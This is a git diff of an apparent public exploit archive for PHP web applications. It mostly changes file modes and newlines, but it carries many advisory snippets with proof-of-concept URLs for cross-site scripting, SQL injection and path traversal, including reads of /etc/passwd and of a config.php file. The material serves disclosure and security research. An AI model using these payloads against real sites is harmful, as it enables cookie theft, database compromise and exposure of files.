a/platforms/php/webapps/36876.txt b/platforms/php/webapps/36876.txt old mode 100755 new mode 100644 index c06dc56ee..78b774a2b --- a/platforms/php/webapps/36876.txt +++ b/platforms/php/webapps/36876.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Oxwall 1.1.1 and prior versions are vulnerable; other versions may also be affected. -http://www.example.com/ow_updates/?plugin=%27%22%28%29%26%251%3CScRiPt%20%3Eprompt%28982087%29%3C%2fScRiPt%3E \ No newline at end of file +http://www.example.com/ow_updates/?plugin=%27%22%28%29%26%251%3CScRiPt%20%3Eprompt%28982087%29%3C%2fScRiPt%3E \ No newline at end of file diff --git a/platforms/php/webapps/36878.txt b/platforms/php/webapps/36878.txt old mode 100755 new mode 100644 index 91664dcee..4f9aa3703 --- a/platforms/php/webapps/36878.txt +++ b/platforms/php/webapps/36878.txt @@ -6,4 +6,4 @@ Attackers can leverage this issue to influence or misrepresent how web content i Mobile Mp3 Search Script 2.0 is vulnerable; other versions may also be affected -http://www.example.com/dl.php?url=http://www.google.it \ No newline at end of file +http://www.example.com/dl.php?url=http://www.google.it \ No newline at end of file diff --git a/platforms/php/webapps/36882.txt b/platforms/php/webapps/36882.txt old mode 100755 new mode 100644 index 6966b08d0..c0dacb5ca --- a/platforms/php/webapps/36882.txt +++ b/platforms/php/webapps/36882.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc MyJobList 0.1.3 is vulnerable; other versions may also be affected. -http://www.example.com/?loc=profile&eid=[SQLi] \ No newline at end of file +http://www.example.com/?loc=profile&eid=[SQLi] \ No newline at end of file diff --git a/platforms/php/webapps/36883.txt b/platforms/php/webapps/36883.txt old mode 100755 new mode 100644 index 85b2b5c2e..70b1613c6 --- a/platforms/php/webapps/36883.txt +++ b/platforms/php/webapps/36883.txt @@ -10,4 +10,4 @@ http://www.example.com/wgarcmin.cgi?URL2FIL=URL+2+File+--%3E&URL=%22%3E%3Cscript http://www.example.com/wgarcmin.cgi?FIL2URL=%3C--+File+2+URL&FILE=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&NEXTPAGE=T -http://www.example.com/wgarcmin.cgi?DOMAIN=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&NEXTPAGE=T \ No newline at end of file +http://www.example.com/wgarcmin.cgi?DOMAIN=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&NEXTPAGE=T \ No newline at end of file diff --git a/platforms/php/webapps/36885.txt b/platforms/php/webapps/36885.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36886.txt b/platforms/php/webapps/36886.txt old mode 100755 new mode 100644 index 27942e4ee..ccfaa36a3 --- a/platforms/php/webapps/36886.txt +++ b/platforms/php/webapps/36886.txt @@ -7,4 +7,4 @@ Attacker-supplied HTML or JavaScript code could run in the context of the affect OSQA 3b is vulnerable; other versions may also be affected. http://www.example.com/questions/ask/ press url bar & put xss code <img src="<img src=search"/onerror=alert("xss")//"> -http://www.example.com/questions/ask/ press picture bar & put xss code <img src="<img src=search"/onerror=alert("xss")//"> \ No newline at end of file +http://www.example.com/questions/ask/ press picture bar & put xss code <img src="<img src=search"/onerror=alert("xss")//"> \ No newline at end of file diff --git a/platforms/php/webapps/36888.html b/platforms/php/webapps/36888.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36889.txt b/platforms/php/webapps/36889.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3689.txt b/platforms/php/webapps/3689.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36890.txt b/platforms/php/webapps/36890.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36891.txt b/platforms/php/webapps/36891.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36892.html b/platforms/php/webapps/36892.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36893.txt b/platforms/php/webapps/36893.txt old mode 100755 new mode 100644 index 803c58048..4b8f5492d --- a/platforms/php/webapps/36893.txt +++ b/platforms/php/webapps/36893.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Fork CMS versions prior to 3.2.7 are vulnerable. -http://www.example.com/private/en/locale/index?name=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \ No newline at end of file +http://www.example.com/private/en/locale/index?name=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/36894.txt b/platforms/php/webapps/36894.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36895.txt b/platforms/php/webapps/36895.txt old mode 100755 new mode 100644 index 26826354b..32f4d8655 --- a/platforms/php/webapps/36895.txt +++ b/platforms/php/webapps/36895.txt @@ -4,4 +4,4 @@ starCMS is prone to a cross-site scripting vulnerability because it fails to pro An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/index.php?q=[Xss]&r=5&lang=de&actionsuche=yes \ No newline at end of file +http://www.example.com/index.php?q=[Xss]&r=5&lang=de&actionsuche=yes \ No newline at end of file diff --git a/platforms/php/webapps/36897.txt b/platforms/php/webapps/36897.txt old mode 100755 new mode 100644 index 418f04984..3bd5a7806 --- a/platforms/php/webapps/36897.txt +++ b/platforms/php/webapps/36897.txt @@ -4,4 +4,4 @@ LastGuru ASP GuestBook is prone to an SQL-injection vulnerability because it fai Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/victim/View.asp?E_Mail=webmaster@lastguru.com' and 'a'='a \ No newline at end of file +http://www.example.com/victim/View.asp?E_Mail=webmaster@lastguru.com' and 'a'='a \ No newline at end of file diff --git a/platforms/php/webapps/36898.txt b/platforms/php/webapps/36898.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36899.txt b/platforms/php/webapps/36899.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36900.txt b/platforms/php/webapps/36900.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36907.txt b/platforms/php/webapps/36907.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3691.txt b/platforms/php/webapps/3691.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36910.txt b/platforms/php/webapps/36910.txt old mode 100755 new mode 100644 index a9132b6bb..efb4df7ec --- a/platforms/php/webapps/36910.txt +++ b/platforms/php/webapps/36910.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to obtain potentially sensitive infor Open Realty version 2.5.8 is vulnerable; other versions may also be affected. -http://www.example.com/open-realty2.5.8/?select_users_template=../../../../../../../../../../../../../../../etc/passwd%00 \ No newline at end of file +http://www.example.com/open-realty2.5.8/?select_users_template=../../../../../../../../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/36911.txt b/platforms/php/webapps/36911.txt old mode 100755 new mode 100644 index cfa7aaf0e..b919b05c1 --- a/platforms/php/webapps/36911.txt +++ b/platforms/php/webapps/36911.txt @@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to compromise the application, a 11in1 1.2.1 is vulnerable; other versions may also be affected. -http://www.example.com/11in1/admin/comments?topicID=1'[SQL Injection Vulnerability!] \ No newline at end of file +http://www.example.com/11in1/admin/comments?topicID=1'[SQL Injection Vulnerability!] \ No newline at end of file diff --git a/platforms/php/webapps/36912.txt b/platforms/php/webapps/36912.txt old mode 100755 new mode 100644 index 9cd861bd1..053bd881c --- a/platforms/php/webapps/36912.txt +++ b/platforms/php/webapps/36912.txt @@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to compromise the application, a 11in1 1.2.1 is vulnerable; other versions may also be affected. -http://www.example.com/11in1/admin/tps?id=1'[SQL Injection Vulnerability!] \ No newline at end of file +http://www.example.com/11in1/admin/tps?id=1'[SQL Injection Vulnerability!] \ No newline at end of file diff --git a/platforms/php/webapps/36914.txt b/platforms/php/webapps/36914.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36916.txt b/platforms/php/webapps/36916.txt old mode 100755 new mode 100644 index 49c95f814..6a16af3cf --- a/platforms/php/webapps/36916.txt +++ b/platforms/php/webapps/36916.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc Exponent CMS 2.0.4 is vulnerable; prior versions may also be affected. -http://www.example.com//exponent/cron/send_reminders.php?src=src%3d11"%3b}'%20or%201%3d1%20AND%20SLEEP(5)%20%3b%20--%20" \ No newline at end of file +http://www.example.com//exponent/cron/send_reminders.php?src=src%3d11"%3b}'%20or%201%3d1%20AND%20SLEEP(5)%20%3b%20--%20" \ No newline at end of file diff --git a/platforms/php/webapps/36917.txt b/platforms/php/webapps/36917.txt old mode 100755 new mode 100644 index f99433a78..28917a33c --- a/platforms/php/webapps/36917.txt +++ b/platforms/php/webapps/36917.txt @@ -38,4 +38,4 @@ It is possible to download and arbitrary file (ie config.php) under the www root http://www.example.com/osclass/oc-content/themes/modern/combine.php?type=./../../../combine.php&files=combine.php 3. Run combine to download config.php -http://www.example.com/osclass/combine.php?files=config.php \ No newline at end of file +http://www.example.com/osclass/combine.php?files=config.php \ No newline at end of file diff --git a/platforms/php/webapps/36926.txt b/platforms/php/webapps/36926.txt old mode 100755 new mode 100644 index 8bd297a55..944e1f39e --- a/platforms/php/webapps/36926.txt +++ b/platforms/php/webapps/36926.txt @@ -4,4 +4,4 @@ LeKommerce is prone to an SQL-injection vulnerability because it fails to suffic Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/path/secc.php?id={sqli} \ No newline at end of file +http://www.example.com/path/secc.php?id={sqli} \ No newline at end of file diff --git a/platforms/php/webapps/36927.txt b/platforms/php/webapps/36927.txt old mode 100755 new mode 100644 index e7252528b..4863827af --- a/platforms/php/webapps/36927.txt +++ b/platforms/php/webapps/36927.txt @@ -8,4 +8,4 @@ The attacker may leverage the cross-site scripting issue to execute arbitrary sc ToendaCMS 1.6.2 is vulnerable; other versions may also be affected. -http://www.example.com/setup/index.php?site=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../tmp/s \ No newline at end of file +http://www.example.com/setup/index.php?site=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../tmp/s \ No newline at end of file diff --git a/platforms/php/webapps/36937.html b/platforms/php/webapps/36937.html old mode 100755 new mode 100644 index 87ef12bc6..044cce99c --- a/platforms/php/webapps/36937.html +++ b/platforms/php/webapps/36937.html @@ -27,4 +27,4 @@ PHPMV_VERSION 2.4 <!--- Author: AkaStep --> </form> </body> -</html> \ No newline at end of file +</html> \ No newline at end of file diff --git a/platforms/php/webapps/36938.txt b/platforms/php/webapps/36938.txt old mode 100755 new mode 100644 index 928a1a8bf..209d2af1c --- a/platforms/php/webapps/36938.txt +++ b/platforms/php/webapps/36938.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow singapore 0.10.1 is vulnerable; other versions may also be affected. -http://www.example.com/patch/index.php?gallery=<script>alert('31337')</script> \ No newline at end of file +http://www.example.com/patch/index.php?gallery=<script>alert('31337')</script> \ No newline at end of file diff --git a/platforms/php/webapps/3694.txt b/platforms/php/webapps/3694.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36942.txt b/platforms/php/webapps/36942.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36944.txt b/platforms/php/webapps/36944.txt old mode 100755 new mode 100644 index 68fdd5ada..ec26394b4 --- a/platforms/php/webapps/36944.txt +++ b/platforms/php/webapps/36944.txt @@ -8,4 +8,4 @@ Photo Station 5 DSM 3.2 (1955) is vulnerable; other versions may also be affecte http://www.example.com/photo/photo_one.php?name=494d475f32303131303730395f3232343432362e6a7067&dir=6970686f6e65207068696c69707065&name=%22%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%38%38%2c%38%33%2c%38%33%29%29%3c%2f%73%63%72%69%70%74%3e -http://www.example.com/photo/photo_one.php?name=494d475f32303131303730395f3232343432362e6a7067&dir=6970686f6e65207068696c69707065&name=%22%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%29%3c%2f%73%63%72%69%70%74%3e%3c%61%20%68%72%65%66%3d%22 \ No newline at end of file +http://www.example.com/photo/photo_one.php?name=494d475f32303131303730395f3232343432362e6a7067&dir=6970686f6e65207068696c69707065&name=%22%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%29%3c%2f%73%63%72%69%70%74%3e%3c%61%20%68%72%65%66%3d%22 \ No newline at end of file diff --git a/platforms/php/webapps/36946.txt b/platforms/php/webapps/36946.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36947.txt b/platforms/php/webapps/36947.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36948.txt b/platforms/php/webapps/36948.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36949.txt b/platforms/php/webapps/36949.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36950.txt b/platforms/php/webapps/36950.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36951.txt b/platforms/php/webapps/36951.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36952.txt b/platforms/php/webapps/36952.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36953.txt b/platforms/php/webapps/36953.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36954.txt b/platforms/php/webapps/36954.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36958.txt b/platforms/php/webapps/36958.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36959.txt b/platforms/php/webapps/36959.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3696.txt b/platforms/php/webapps/3696.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36961.txt b/platforms/php/webapps/36961.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36965.txt b/platforms/php/webapps/36965.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36967.txt b/platforms/php/webapps/36967.txt old mode 100755 new mode 100644 index 76f1d81e6..409980c99 --- a/platforms/php/webapps/36967.txt +++ b/platforms/php/webapps/36967.txt @@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to execute arbitrary HTML and sc Max's Guestbook 1.0 is vulnerable; other versions may also be affected. -http://www.example.com/max/index.php?page=../../../../../../../../../../../../../../../../../etc/passwd%00 \ No newline at end of file +http://www.example.com/max/index.php?page=../../../../../../../../../../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/36968.txt b/platforms/php/webapps/36968.txt old mode 100755 new mode 100644 index 1e084759d..20e2c2b7a --- a/platforms/php/webapps/36968.txt +++ b/platforms/php/webapps/36968.txt @@ -4,4 +4,4 @@ Max's PHP Photo Album is prone to a local file-include vulnerability because it An attacker can exploit this vulnerability to view files and execute local scripts in the context of the webserver process. -http//www.example.com/maximage/showImage.php?id=../../../../../../../../../../../../etc/passwd%00 \ No newline at end of file +http//www.example.com/maximage/showImage.php?id=../../../../../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/3697.txt b/platforms/php/webapps/3697.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36970.txt b/platforms/php/webapps/36970.txt old mode 100755 new mode 100644 index ed2182e92..47430f9a7 --- a/platforms/php/webapps/36970.txt +++ b/platforms/php/webapps/36970.txt @@ -6,4 +6,4 @@ A successful exploit may allow an attacker to compromise the application, access JPM Article Script 6 is vulnerable; other versions may also be affected. -http://www.example.com/blog/index.php?page2=-1%27&cid=0 \ No newline at end of file +http://www.example.com/blog/index.php?page2=-1%27&cid=0 \ No newline at end of file diff --git a/platforms/php/webapps/36973.txt b/platforms/php/webapps/36973.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36975.txt b/platforms/php/webapps/36975.txt old mode 100755 new mode 100644 index 65c0dce7c..c2d177b5a --- a/platforms/php/webapps/36975.txt +++ b/platforms/php/webapps/36975.txt @@ -4,4 +4,4 @@ Vacation Packages is prone to an SQL-injection vulnerability because it fails to A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://wwww.example.com/vacation-packages/demo.php?controller=Listings&action=search&listing_search=1&season=2' \ No newline at end of file +http://wwww.example.com/vacation-packages/demo.php?controller=Listings&action=search&listing_search=1&season=2' \ No newline at end of file diff --git a/platforms/php/webapps/36986.txt b/platforms/php/webapps/36986.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36989.txt b/platforms/php/webapps/36989.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3699.txt b/platforms/php/webapps/3699.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36990.txt b/platforms/php/webapps/36990.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36991.txt b/platforms/php/webapps/36991.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36992.txt b/platforms/php/webapps/36992.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36993.txt b/platforms/php/webapps/36993.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36997.txt b/platforms/php/webapps/36997.txt old mode 100755 new mode 100644 index 8337128fa..8e4150c0a --- a/platforms/php/webapps/36997.txt +++ b/platforms/php/webapps/36997.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow CMSimple 3.3 is vulnerable; other versions may also be affected. -http://www.example.com//cmsimple/cmsimplexh152/?'"</script><script>alert(document.cookie)</script> \ No newline at end of file +http://www.example.com//cmsimple/cmsimplexh152/?'"</script><script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/36999.txt b/platforms/php/webapps/36999.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3700.txt b/platforms/php/webapps/3700.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37000.txt b/platforms/php/webapps/37000.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37001.txt b/platforms/php/webapps/37001.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37002.txt b/platforms/php/webapps/37002.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37003.txt b/platforms/php/webapps/37003.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37004.txt b/platforms/php/webapps/37004.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37008.txt b/platforms/php/webapps/37008.txt old mode 100755 new mode 100644 index c3ab0e45f..52216c732 --- a/platforms/php/webapps/37008.txt +++ b/platforms/php/webapps/37008.txt @@ -4,4 +4,4 @@ Event Calendar PHP is prone to a cross-site scripting vulnerability because it f An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/demo_eventcalendar.php?cal_id=1&cal_month=2&cal_year=[XSS] \ No newline at end of file +http://www.example.com/demo_eventcalendar.php?cal_id=1&cal_month=2&cal_year=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/3701.txt b/platforms/php/webapps/3701.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37010.txt b/platforms/php/webapps/37010.txt old mode 100755 new mode 100644 index 5fef243f6..154b90611 --- a/platforms/php/webapps/37010.txt +++ b/platforms/php/webapps/37010.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow FbiLike 1.00 is vulnerable; other versions may also be affected. -http://www.example.com/fbilike/like.php?id=[XSS] \ No newline at end of file +http://www.example.com/fbilike/like.php?id=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/37011.txt b/platforms/php/webapps/37011.txt old mode 100755 new mode 100644 index 48824cb62..1b0d3cd52 --- a/platforms/php/webapps/37011.txt +++ b/platforms/php/webapps/37011.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc Geeklog 1.8.1 is vulnerable; other versions may also be affected. -http://www.example.com/easyfile/index.php?folder=(SQLI) \ No newline at end of file +http://www.example.com/easyfile/index.php?folder=(SQLI) \ No newline at end of file diff --git a/platforms/php/webapps/37012.txt b/platforms/php/webapps/37012.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37013.txt b/platforms/php/webapps/37013.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37016.txt b/platforms/php/webapps/37016.txt old mode 100755 new mode 100644 index 0b32410e6..b4ab629d7 --- a/platforms/php/webapps/37016.txt +++ b/platforms/php/webapps/37016.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow WordPress Integrator 1.32 is vulnerable; other versions may also be affected. -http://www.example.com/wordpress/wp-login.php?redirect_to=http://%3F1<ScrIpT>alert(666)</ScrIpT> \ No newline at end of file +http://www.example.com/wordpress/wp-login.php?redirect_to=http://%3F1<ScrIpT>alert(666)</ScrIpT> \ No newline at end of file diff --git a/platforms/php/webapps/37017.txt b/platforms/php/webapps/37017.txt old mode 100755 new mode 100644 index 5bdf2f89f..1124d703d --- a/platforms/php/webapps/37017.txt +++ b/platforms/php/webapps/37017.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Invision Power Board 4.2.1 is vulnerable; other versions may also be affected. -http://www.example.com/index.php?s=blablabla&&app=gallery&module=ajax&section=albumSelector&do=albumSelectorPane&secure_key=blalblabla&type=upload&albums=search&moderate=&album_id=1593&member_id=&searchType=member&searchMatch=is&searchIsGlobal=0&searchSort=date&searchDir=desc&searchText=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Ealert%280x000252%29%3C%2Fscript%3E \ No newline at end of file +http://www.example.com/index.php?s=blablabla&&app=gallery&module=ajax&section=albumSelector&do=albumSelectorPane&secure_key=blalblabla&type=upload&albums=search&moderate=&album_id=1593&member_id=&searchType=member&searchMatch=is&searchIsGlobal=0&searchSort=date&searchDir=desc&searchText=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Ealert%280x000252%29%3C%2Fscript%3E \ No newline at end of file diff --git a/platforms/php/webapps/37018.txt b/platforms/php/webapps/37018.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37019.txt b/platforms/php/webapps/37019.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3702.php b/platforms/php/webapps/3702.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37021.txt b/platforms/php/webapps/37021.txt old mode 100755 new mode 100644 index 239be8dc6..bb99a5a1e --- a/platforms/php/webapps/37021.txt +++ b/platforms/php/webapps/37021.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to obtain potentially sensitive infor TomatoCart 1.2.0 Alpha 2 is vulnerable; other versions may also be affected. -http://www.example.com/json.php?action=3&module=../../../../../../../../../../../../../../boot.ini%00 \ No newline at end of file +http://www.example.com/json.php?action=3&module=../../../../../../../../../../../../../../boot.ini%00 \ No newline at end of file diff --git a/platforms/php/webapps/37022.txt b/platforms/php/webapps/37022.txt old mode 100755 new mode 100644 index ba688bd69..4f066f543 --- a/platforms/php/webapps/37022.txt +++ b/platforms/php/webapps/37022.txt @@ -10,4 +10,4 @@ http://www.example.com/code_editor.php?path=%22%3E%3Cscript%3Ealert%28document.c http://www.example.com/code_editor.php?path&line=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E -http://www.example.com/site/catalogue_file.php?original_filename=1.txt&file=%252e%252e%252f%252e%252e%252finfo.php \ No newline at end of file +http://www.example.com/site/catalogue_file.php?original_filename=1.txt&file=%252e%252e%252f%252e%252e%252finfo.php \ No newline at end of file diff --git a/platforms/php/webapps/37023.txt b/platforms/php/webapps/37023.txt old mode 100755 new mode 100644 index dab872163..4338af9d2 --- a/platforms/php/webapps/37023.txt +++ b/platforms/php/webapps/37023.txt @@ -4,4 +4,4 @@ EasyPHP is prone to an SQL-injection vulnerability because the application fails A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. -http://www.example.com/home/sqlite/main.php?dbsel=1&table=t1' \ No newline at end of file +http://www.example.com/home/sqlite/main.php?dbsel=1&table=t1' \ No newline at end of file diff --git a/platforms/php/webapps/37024.txt b/platforms/php/webapps/37024.txt old mode 100755 new mode 100644 index 86c48b00e..3e9b7f06a --- a/platforms/php/webapps/37024.txt +++ b/platforms/php/webapps/37024.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow eZ Publish 4.6 is vulnerable; other versions may also be affected. -http://www.example.com/ezjscore/call<img%20src%3Dlien%20onerror%3Dalert(document.cookie)>/ezjsc:time \ No newline at end of file +http://www.example.com/ezjscore/call<img%20src%3Dlien%20onerror%3Dalert(document.cookie)>/ezjsc:time \ No newline at end of file diff --git a/platforms/php/webapps/37025.txt b/platforms/php/webapps/37025.txt old mode 100755 new mode 100644 index b444d9fe1..3f9f7d32b --- a/platforms/php/webapps/37025.txt +++ b/platforms/php/webapps/37025.txt @@ -5,4 +5,4 @@ PHP Designer 2007 - Personal is prone multiple SQL-injection vulnerabilities. A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/read_news.php?news_id=[Sqli] -http://www.example.com/announce.php?id=[Sqli] \ No newline at end of file +http://www.example.com/announce.php?id=[Sqli] \ No newline at end of file diff --git a/platforms/php/webapps/37026.txt b/platforms/php/webapps/37026.txt old mode 100755 new mode 100644 index 60722e8a9..0695f34ae --- a/platforms/php/webapps/37026.txt +++ b/platforms/php/webapps/37026.txt @@ -6,4 +6,4 @@ A successful exploit may allow an attacker to compromise the application, access e107 1.0.0 is vulnerable; other versions may also be affected. -http://www.example.com/index.php?option=com_flexicontent&view=[Sql] \ No newline at end of file +http://www.example.com/index.php?option=com_flexicontent&view=[Sql] \ No newline at end of file diff --git a/platforms/php/webapps/37027.txt b/platforms/php/webapps/37027.txt old mode 100755 new mode 100644 index 0d6997bf2..d481ffc3d --- a/platforms/php/webapps/37027.txt +++ b/platforms/php/webapps/37027.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Simple Machines Forum 2.0.2 is vulnerable; other versions may also be affected. -http://www.example.com/index.php?scheduled=[Xss] \ No newline at end of file +http://www.example.com/index.php?scheduled=[Xss] \ No newline at end of file diff --git a/platforms/php/webapps/37028.txt b/platforms/php/webapps/37028.txt old mode 100755 new mode 100644 index 7f9fa7b8c..c4c235bd2 --- a/platforms/php/webapps/37028.txt +++ b/platforms/php/webapps/37028.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow JamWiki 1.1.5 is vulnerable; other versions may also be affected. -http://www.example.com/jamwiki/en/Special:AllPages?num=[XSS] \ No newline at end of file +http://www.example.com/jamwiki/en/Special:AllPages?num=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/3703.txt b/platforms/php/webapps/3703.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37034.txt b/platforms/php/webapps/37034.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37035.html b/platforms/php/webapps/37035.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37038.txt b/platforms/php/webapps/37038.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37039.txt b/platforms/php/webapps/37039.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3704.txt b/platforms/php/webapps/3704.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37040.txt b/platforms/php/webapps/37040.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37041.txt b/platforms/php/webapps/37041.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37042.txt b/platforms/php/webapps/37042.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37043.txt b/platforms/php/webapps/37043.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37044.txt b/platforms/php/webapps/37044.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37045.txt b/platforms/php/webapps/37045.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37046.txt b/platforms/php/webapps/37046.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37047.html b/platforms/php/webapps/37047.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37048.txt b/platforms/php/webapps/37048.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3705.txt b/platforms/php/webapps/3705.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37050.txt b/platforms/php/webapps/37050.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37055.txt b/platforms/php/webapps/37055.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3706.txt b/platforms/php/webapps/3706.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37062.txt b/platforms/php/webapps/37062.txt old mode 100755 new mode 100644 index 98e5ce163..b5e593309 --- a/platforms/php/webapps/37062.txt +++ b/platforms/php/webapps/37062.txt @@ -6,4 +6,4 @@ A successful exploit may allow an attacker to compromise the application, access VBulletin 4.1.10 is vulnerable; other versions may also be affected. -http://www.example.com/announcement.php?a=&announcementid=[Sql] \ No newline at end of file +http://www.example.com/announcement.php?a=&announcementid=[Sql] \ No newline at end of file diff --git a/platforms/php/webapps/37063.txt b/platforms/php/webapps/37063.txt old mode 100755 new 